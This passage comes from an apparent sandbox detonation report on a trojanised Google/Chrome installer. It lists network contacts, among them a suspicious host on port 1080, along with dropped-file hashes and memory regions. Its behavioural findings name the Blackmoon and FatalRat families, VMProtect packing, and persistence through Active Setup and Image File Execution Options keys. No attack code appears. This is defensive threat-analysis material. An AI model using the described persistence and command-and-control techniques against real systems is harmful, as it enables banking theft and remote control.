GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.201.99:443 update.googleapis.com tcp

Files

\Windows\Installer\MSIBC6C.tmp

MD5 c7fbd5ee98e32a77edf1156db3fca622
SHA1 3e534fc55882e9fb940c9ae81e6f8a92a07125a0
SHA256 e140990b509dd6884a5742bde64f2cdaa10012d472b0b32de43ebecbc83242b6
SHA512 8691ac8b214cc1e4f34a3ab2bbc0c2391f7f11ebbe5db0dc82825195b5fe5a05310ed1e14d253a9b74a64050d2f2a6623dd2fcd912f80fef51e51845ef1e3a1a

C:\Windows\Installer\MSIBD97.tmp

MD5 ae463676775a1dd0b7a28ddb265b4065
SHA1 dff64c17885c7628b22631a2cdc9da83e417d348
SHA256 83fbfcaff3da3eb89f9aec29e6574cf15502fd670cbb2ab0c8a84451b2598b22
SHA512 e47c2db249e7a08c5d2864671fbc235e48aebecbe0b2c2334d1a4cba1b5b3037522ff89408589f3559b3a1eaf507bd338645387d55800029bb3b941d4c7744d6

C:\Config.Msi\f76bc13.rbs

MD5 28fb83b3fd1e266a1ae70058bbc530a0
SHA1 c07d64269a927c057f0d6a63f5f83f5f6daaf984
SHA256 a99f78924e00d6fc234093f5ae38cdb58c274715d47f74898ee5ebd67351c06a
SHA512 00f30b2b1dff0509de0e31ff9b84c03e2bd046945615de514de4f6130b10c9d0a09ffbfe81a376b41884c702e4db6bb503b17dfbb15758224ea59409a7a4a780

\ProgramData\setup\aa.exe

MD5 09c448be7e7d84e6e544cc03afbb05d8
SHA1 ddc13e71a72bc49c60f89b98cbb79c2449cfa07e
SHA256 a0f127a70943b0262060498c1723c795a8e2980f1acf0c42ee8c1dae72ae54b5
SHA512 e5f7a988a999e7e34d0aa2d2a5b2fbb22689588d3def4bed4518ceed38710e3714c5614bab192b0ce6bcac5172a87ebf3b3b923e495eb7344c70bd11f4bf1c12

C:\ProgramData\setup\ddd

MD5 9bd359e3956d119811c3a6abef58e644
SHA1 9f221781f406ebcb15fc2c02d5d259116155c734
SHA256 ead38673817c84de77a4d2fe6118e6a96f863e3db38f73518007caa2af676146
SHA512 7f817794728e532da07424c621eeef161501644d137068895391505d7110f1f8ee9dc76944946e3960f84e462c66fd82ee61b619ca91a07166aed5d3434f618b

memory/1536-56-0x0000000000400000-0x0000000000510000-memory.dmp

\ProgramData\Packas\scrok.exe

MD5 a03b2eaa4d517fd935bb0032d444f22d
SHA1 014864aac638b7c04b4d50e6c39d7266eafda773
SHA256 6fd145b1de7d0a143fd25274544d5e3c4ecee06cf3e31631d51cae8ca3e25f01
SHA512 68a253fcdb3cd1a086fe93fa7c8a7500d6b5414bdfc0dad555973697d4fb552e09088b849573f705ca91b1652ddd4572842b82d40f5821761b3ac299e465be51

memory/1628-63-0x00000000779D0000-0x00000000779D2000-memory.dmp

memory/1628-61-0x00000000779D0000-0x00000000779D2000-memory.dmp

memory/1628-65-0x00000000779D0000-0x00000000779D2000-memory.dmp

memory/1628-66-0x000000013F940000-0x000000013FEF9000-memory.dmp

memory/596-69-0x0000000000200000-0x0000000000229000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

MD5 d305d506c0095df8af223ac7d91ca327
SHA1 679cb4c763c84e75ccb0fa3475bd6b7a36e81c4a
SHA256 923111c7142b3dc783a3c722b19b8a21bcb78222d7a136ac33f0ca8a29f4cb66
SHA512 94d369a4db88bff9556a1d7a7fb0188ed935c3592bae09335542c5502ec878e839177be63ac3ab4af75d4dc38a3a4f5d0fd423115ac72cf5dd710c59604db796

memory/3012-75-0x00000000012C0000-0x0000000001396000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.xml

MD5 2c706293a3cfff8cc184a8e9a3b3da08
SHA1 873d7c9f51aa6cebd4ad3ae5930d1de84bb4437d
SHA256 ed28baf8be3a588d50ed246c2cd741bbd498aee74ea0675d57e0b33236e22067
SHA512 4aba3e25507ba5c29219ff51553f3616d07aeeb30f7465f9e921eea94cdcb411d1f48d1eefed647c22405df275e7f9d7506aac52202aae137391c6831463b043

memory/3008-83-0x0000000000290000-0x0000000000366000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 a28d7de900751a5d606662f42f04bf14
SHA1 945bdc554657bd52e13b9cdfc3a793ad9e036734
SHA256 0ed44f3613f1b51fc5d00335f63e680cb6bfada5e2ea9a0d31738848864e5f13
SHA512 efa99c1ed2c42c50c04d160411a1e3317643049dd3084cbd89687bc44e556634cbc70c574f46c8d62efa2f398b013f5bfb995b74967a85b462737f13b3f719e6

memory/572-92-0x0000000000160000-0x0000000000236000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 9ebd1a59c2cd58ef1707299c94b45a94
SHA1 262222a28f05520f1b5928c1c242b1ee48035f90
SHA256 dff968204022fff598b65b54a492a217efa3152c318ac4306d2d312448304592
SHA512 4d5bba53443048db049b3a37fe7b67ed3bfb5f1eff2eaf4571fd44f02b8f35d9a289784ea0306e7e9756f62b578adbd8056de2e0dc70f28d01c70f9042338383

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 ec75f79bf26da5705b430094d32251d7
SHA1 3515da89d252a66eec8b7b8690f206f8a21919e0
SHA256 80986ffaaa50da172158c4f89451c717dbed7ee6bd82bf69e7eaf03e3588c869
SHA512 161fea24d5b88721cfdbc343b5f0b36226b25793f3ad13b028ec02786b02e00e497877a2c060c78be85f842df6a9445410d735c8727b5756f7523a2a31eb2ba5

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 3cad336ccb2404ad655886d8e3642cbe
SHA1 a69f9981105a6abe573c3e27a2591545006c42c6
SHA256 a2baf0be39503081bf5e536e6d7c50d6673c1b39e3faf465eba458cdfad74e33
SHA512 66f61b429d237cc254a49cd5f63a62de170e166f56b7aa6a3c0324efabc7a8967dd7b05198657aa9c1555797ceb7c59a04d9f8828c7929fa6a0b1f65b9d42e72

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 3eb0e1895b9ff9d9d60d52a83b3e7ee0
SHA1 dc17e700ba5b5a236d77437c16561e9b10231d60
SHA256 bd51697fd9aa8850b518da380a9283a1c95952d1f31da0d33a317595e7bf0c22
SHA512 b72d30b0970696f075e4ddc537936598dd6cf83022b1bb9f578401661b34701c8eeaf3959a2555febe571cbcc728a7061c2d2f2bbf66d80d922b2670a046feab

C:\ProgramData\Smart\setup.exe

MD5 118a9a9f6280e177fdac16989b8aa1a5
SHA1 fc37316439372be17a982d02cd0d294f7aaca751
SHA256 b995e6a0299f2465fd5881157aab1c6c9753c8e459efd661b9cd1e83be7e53f6
SHA512 14c731e7f7e9736f39d6c79a98bf1a3264da9dc76bab4faca82ec64f276f3d39c9bc4638991e30a06f52bf6204619f5da8c3168d11afe058e0c1d21a89d42878

memory/1388-111-0x00000000779D0000-0x00000000779D2000-memory.dmp

memory/1388-112-0x000000013FC50000-0x0000000140209000-memory.dmp

C:\ProgramData\setup\setup.exe

MD5 4a94844260d6a08828d781d488cef61d
SHA1 de8169fdb5ab8a120df577d92eb25a2767431738
SHA256 46d7a8abe3bb9d7302529246cd8ee6e7d0360d1045fe92662cc7580e72ef5132
SHA512 82549c1e525a90003fb0174ebba2bc3b4f58706ef9fd5e6ee07d489ab536ef286e408db6c15a52b039d3f59c09bd55e35d045def79007da5d414d5d589d34f4f

\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe

MD5 cdf152e23a8cbf68dbe3f419701244fc
SHA1 cb850d3675da418131d90ab01320e4e8842228d7
SHA256 84eaf43f33d95da9ab310fc36dc3cfe53823d2220946f021f18cf3f729b8d64e
SHA512 863e1da5bc779fa02cf08587c4de5f04c56e02902c5c4f92a06f2e631380ecabcc98e35d52609f764727e41b965c0786d24ea23fc4b9776d24d9f13e0d8ae0c2

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdate.dll

MD5 dae72b4b8bcf62780d63b9cbb5b36b35
SHA1 1d9b764661cfe4ee0f0388ff75fd0f6866a9cd89
SHA256 b0ca6700e7a4ea667d91bcf3338699f28649c2e0a3c0d8b4f2d146ab7c843ab6
SHA512 402c00cab6dac8981e200b6b8b4263038d76afe47c473d5f2abf0406222b32fff727b495c6b754d207af2778288203ce0774a6200b3e580e90299d08ce0c098f

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_zh-CN.dll

MD5 ca52cc49599bb6bda28c38aea1f9ec4e
SHA1 494f166b530444f39bca27e2b9e10f27e34fc98a
SHA256 f9f144aa2dc0de21b24c93f498a9b4a946b7da42819a776b3283a0bcae18544b
SHA512 05e2d5711eef8f57737b2512de2e73744f17e0a34de0bfd2a06c9cc60a08ebadbafe38e30b66a2ede7fa61d5b9571adddcfbd7e1cafcee1ab2168a563d2d3f0d

memory/1864-208-0x0000000000400000-0x0000000000BA0000-memory.dmp

memory/1864-207-0x0000000000250000-0x0000000000251000-memory.dmp

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_es-419.dll

MD5 1c0b1c3625c9ccace1b23e0c64095ee9
SHA1 3904a80d016e0a9a267c0b5feb8e6747b44b5fa1
SHA256 f030757e1911e9efde0d74a02c22694fa5ef139f73897a7f97acab9da05f7c8b
SHA512 0a988edef8d67cd83c2be65cbfa07059df311732ee92ad73fb9411d7cf7d853a2b8d2ab801733d05ab6afaccab33a2684117bbc1d80b362b677cc53ae9de42f0

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_es.dll

MD5 dae64d49ee97339b7327b52c9f720848
SHA1 15f159c4808f9e4fe6a2f1a4a19faa5d84ac630b
SHA256 e76400e62ae0ab31565e50b05d1001b775a91aa487a54dc90e53c0e103c717c2
SHA512 9ae72e5a658aa0e1fb261d62ccef474cd42d9bec2b4a50f71925d131ffea22b8f60fb961772587ce71cb30a32da3b7986e7483ecea960a509e0450d3983c84b0

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_en-GB.dll

MD5 f82ccf890c3ae14bfd7a263d07276e60
SHA1 6a915d6eb8c99d065e36a721d721d556b74bb377
SHA256 6b07a4fd3039541e30c68a8c31c371cda2cea480787f95e0ddbca3cc2fbff0cc
SHA512 4cbf9e6728e08de8d61f34b17bb20d92b6a699969edb9afa013fe962c8fd39238288adcd826134c9bca459904d8574a804c519daac6b301e0d38f68722c0359e

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_en.dll

MD5 741211652c66a8a6790396e1875eefa9
SHA1 2ccd5653b5fc78bcc19f86b493cef11844ba7a0c
SHA256 e0945deacdb6b75ff2587dea975774b9b800747e2ee3f3917e5b40ddb87eda10
SHA512 b70f847d8ca8828c89bbb67b543950fbd514c733cf62b52ad7fc0dab7b2168fe56d1f21bef3210f5c7f563f72831455d870a5f9aa6c557f1e3543ef7329c42f9

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_el.dll

MD5 ecdd26049573614b6f41d8a102ffcf21
SHA1 5140c6cff5d596267a64df1559ac36c4e8f49e42
SHA256 a3377520f2a95b8cc06bd30e493962c07f97eebf4661a69d03efb36b2ca515c5
SHA512 933c181d7575f20480c8deadac3f3e9190081456169122216c72e7b9a04aa75612140fc37697098c7c20b77001a67966fa1661cdc9110c40634c944f833a65b1

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_de.dll

MD5 96d92500b9a763f4b862c511c17e0a47
SHA1 2fd441eb8685d15e14fa6405e82359adea3e7148
SHA256 58829d135ff41e574ed5fc5e0421e4aa204267b02ca3ffaf08d8efb0a70fdd4c
SHA512 a1014584f1f278160d579848fa188f627676aee819e9395517490b00e273db6f583d7ddd31af6e35c9d251021df7fb26c88512aaa1c865c2ee3ba60c0a2db49a

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_da.dll

MD5 9f2e018a4f9a1d278983d0b677b91218
SHA1 c58ee1fc0d8ef9d99f85426b48c7f28f381a2c17
SHA256 d0dcdc68236eecd6b5f0b437eb92b8935741dabf1fa276a552399815af22edec
SHA512 20b74b6a9f81527d4a5fe30671d2559261fb682576f4ab04da7856280fbbaeb6af83894009c9d7cb83deeae988d0ac5ec7ec32b277b7eb45829faec2857d7014

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_cs.dll

MD5 b9033db8d0e5bf254979b0f47d10e93d
SHA1 2859de0d851b5f4fd3056e8f9015cece2436c307
SHA256 12c41c2f472b6a05fd6392e9d4f8aeb9a40840c2cbefd68b39d20f9d1d4d77ed
SHA512 52075df4ae5c86ebb0bac20604ea072a163761ae058c1473211bf4bb0eeed043cfc5a92386f876b53484cdf4e3f8a7b75d8f4bf9894c24f8c22ec23a50b70b7c

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_ca.dll

MD5 39e25ba8d69f493e6f18c4ef0cf96de8
SHA1 5584a94a85d83514a46030c4165e8f7a942e63e2
SHA256 1f66ebdcaae482a201a6e0fab9c1f4501c23a0d4ad819ccd555fdca9cc7edb94
SHA512 773c995b449d64e36eb8cab174db29e29e29985bcfd714799d6b05b01bb7d4a0fc2aefaf2e27ff02b0e105fbe0d34d7efe29b193a1bc3365ec47e1f1003bed26

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_bn.dll

MD5 dafa45a82ce30cf2fd621e0a0b8c031f
SHA1 e39ed5213f9bb02d9da2c889425fab8ca6978db7
SHA256 d58e5f0fa894123de1d9b687a5b84826e095eca128ee5df8870f2db74f4233a2
SHA512 2b772ebc128eb59d636eec36583329962ead8e0a399fd56394b1244486bf815f4e033ceef74a62a9930ab2bf6ec1ba5e2d3c942183f7cb2355a716a3e2c6c7a1

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_bg.dll

MD5 c523ec13643d74b187b26b410d39569b
SHA1 46aff0297036c60f22ad30d4e58f429890d9e09d
SHA256 80505863866bcd93a7e617dd8160531401d6d05f48d595348cd321cf7d97aeac
SHA512 ecf98e29a3481b05ab23c3ff89fa3caf054b874ed15462a5e33022aacf561d8fea4a0de35cc5f7450f62110ca4ace613e0c67f543ad22eb417e79eb3ebf24ed7

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_ar.dll

MD5 163695df53cea0728f9f58a46a08e102
SHA1 71b39eec83260e2ccc299fac165414acb46958bd
SHA256 f89dddda3e887385b42ea88118ba8fb1cc68fde0c07d44b851164564eb7c1ec8
SHA512 6dfb70a175097f3c96ae815a563c185136cb5a35f361288cc81570facfa1f1d28f49eaa61172d1da4982ebb76bd3e32c4de77cf97dedfb79f18113d7594d0989

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_am.dll

MD5 849bc7e364e30f8ee4c157f50d5b695e
SHA1 b52b8efa1f3a2c84f436f328decd2912efeb1b18
SHA256 f1384a25a6f40e861455c62190d794415f3e9bfca6317c214847e9535dfc3fb9
SHA512 6fd7f542a7073b3bbf1b0c200bb306b30f1b35a64a1fb013f25c7df76f63ef377d9bd736e8da2e9372f1c994785eaeedb6b60e3a0d4a4e8734c266ad61782d3b

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdateComRegisterShell64.exe

MD5 be535d8b68dd064442f73211466e5987
SHA1 aa49313d9513fd9c2d2b25da09ea24d09cc03435
SHA256 c109bcb63391ac3ea93fb97fbdf3f6ed71316cacb592ef46efaea0024bc9ed59
SHA512 eb50eebeaf83be10aea8088e35a807f9001d07d17d2bc1655c3bc0cb254d0f54303348988514ba5590ebd9d3bde3f1149c3f700f62fbce63c0199ea3cfb1f638

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleCrashHandler64.exe

MD5 b659663611a4c2216dff5ab1b60dd089
SHA1 9a14392a5bdb9ea6b8c3e60224b7ff37091d48b5
SHA256 cad4aa1cf58f6b2e2aceb789d53b18418e67066ec406b2fac786cb845ef89d2b
SHA512 1065f9072cd6f1f4364f1354108f2647ee1d89f87e908a22fcd63bd3149c864c457e62268067a439d0486d8d4aa150aa984ad8ac8b51cae49014b67b80496040

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleCrashHandler.exe

MD5 a11ce10ac47f5f83b9bc980567331a1b
SHA1 63ee42e347b0328f8d71a3aa4dde4c6dc46da726
SHA256 101dbf984c4b3876defe2699d6160acbf1bb3f213e02a32f08fdcdc06821c542
SHA512 ff2f86c4061188ead1bfeebd36de7dbc312adcc95267537697f2bfcbb0c53e7c4ab0cd268cef22f0182391796c4612c97cbdc1266d9ee1960cdd2610d8c2bcb3

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdateCore.exe

MD5 af51ea4d9828e21f72e935b0deae50f2
SHA1 c7fe57c2a16c9f5a5ebdd3cc0910427cba5308bd
SHA256 3575011873d0f6d49c783095dae06e6619f8f5463da578fbe284ca5d1d449619
SHA512 ec9828d0bade39754748fb53cfc7efdc5e57955198bac3c248ea9b5a9a607182bb1477819f220549a8e9eadbe6bf69a12da6c8af3761980d2dd9078eaeaa932f

memory/1864-205-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1864-203-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1624-366-0x0000000000400000-0x000000000090B000-memory.dmp

memory/448-370-0x0000000000400000-0x000000000090B000-memory.dmp

memory/448-372-0x0000000010000000-0x000000001002D000-memory.dmp

C:\Program Files\Google\Chrome\Application\109.0.5414.120\Installer\setup.exe

MD5 b42b8ac29ee0a9c3401ac4e7e186282d
SHA1 69dfb1dd33cf845a1358d862eebc4affe7b51223
SHA256 19545e8376807bce8a430c37cab9731e85052103f769dd60a5da3d93ca68c6ec
SHA512 b5269e7392e77a0fa850049ff61e271c5aab90d546945b17a65cc2ea6420432ae56321e1e39cfd97ccdb3dfc37ddbd6ff77907f5685cc2323b8635c8cdb4a84f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb

MD5 3433ccf3e03fc35b634cd0627833b0ad
SHA1 789a43382e88905d6eb739ada3a8ba8c479ede02
SHA256 f7d5893372edaa08377cb270a99842a9c758b447b7b57c52a7b1158c0c202e6d
SHA512 21a29f0ef89fec310701dcad191ea4ab670edc0fc161496f7542f707b5b9ce619eb8b709a52073052b0f705d657e03a45be7560c80909e92ae7d5939ce688e9c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Temp\scoped_dir2848_590376402\7505a65e-163f-4408-abb6-dda5be95f00e.tmp

MD5 541f52e24fe1ef9f8e12377a6ccae0c0
SHA1 189898bb2dcae7d5a6057bc2d98b8b450afaebb6
SHA256 81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82
SHA512 d779d78a15c5efca51ebd6b96a7ccb6d718741bdf7d9a37f53b2eb4b98aa1a78bc4cfa57d6e763aab97276c8f9088940ac0476690d4d46023ff4bf52f3326c88

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Temp\scoped_dir2848_590376402\CRX_INSTALL\_locales\en\messages.json

MD5 dbedf86fa9afb3a23dbb126674f166d2
SHA1 5628affbcf6f897b9d7fd9c17deb9aa75036f1cc
SHA256 c0945dd5fdecab40c45361bec068d1996e6ae01196dce524266d740808f753fe
SHA512 931d7ba6da84d4bb073815540f35126f2f035a71bfe460f3ccaed25ad7c1b1792ab36cd7207b99fddf5eaf8872250b54a8958cf5827608f0640e8aafe11e0071

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 9223c8df3d34bdfba4a0d9aed978bf3a
SHA1 8e87a4029d9c5eb5b83e60026fc5e9c3b00db972
SHA256 235abe0e9a1c95a0f4f8782374fddf4469ff3b2bedc1c5f1c28e23bf1728ce57
SHA512 0e28865f8121ecaf0787263dcb1603567c550e155ea484a706fbb956d2301812ef5dce36508d138cbf6205615da32015be606b3e91a6706403b88c658a1c8d14

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d541830367cb5786e168cbf9b6965148
SHA1 034f9dce2104bad0a65ec405a956e2087b16a5ba
SHA256 6ef2336e61669dda34a0f95da3864ba5561160f8dd06257e2857c7dcec580f65
SHA512 20d558378b418341e248d55261bfe6348c9a3c01906fe3fc444c78c440dbcf1e9deededa01889792de750b8343bca6106cd2c9eb5db6a3c71a0ba54deb8fbb49

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-21 23:06

Reported

2025-02-21 23:10

Platform

win10ltsc2021-20250217-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch -p

Signatures

Blackmoon family

blackmoon

Blackmoon, KrBanker

trojan banker blackmoon

Detect Blackmoon payload

Description Indicator Process Target
N/A N/A N/A N/A

FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

Fatal Rat payload

rat infostealer

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

VMProtect packed file

vmprotect

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Active Setup

persistence

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\133.0.6943.127\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level --channel=stable" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Event Triggered Execution: Image File Execution Options Injection

persistence

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
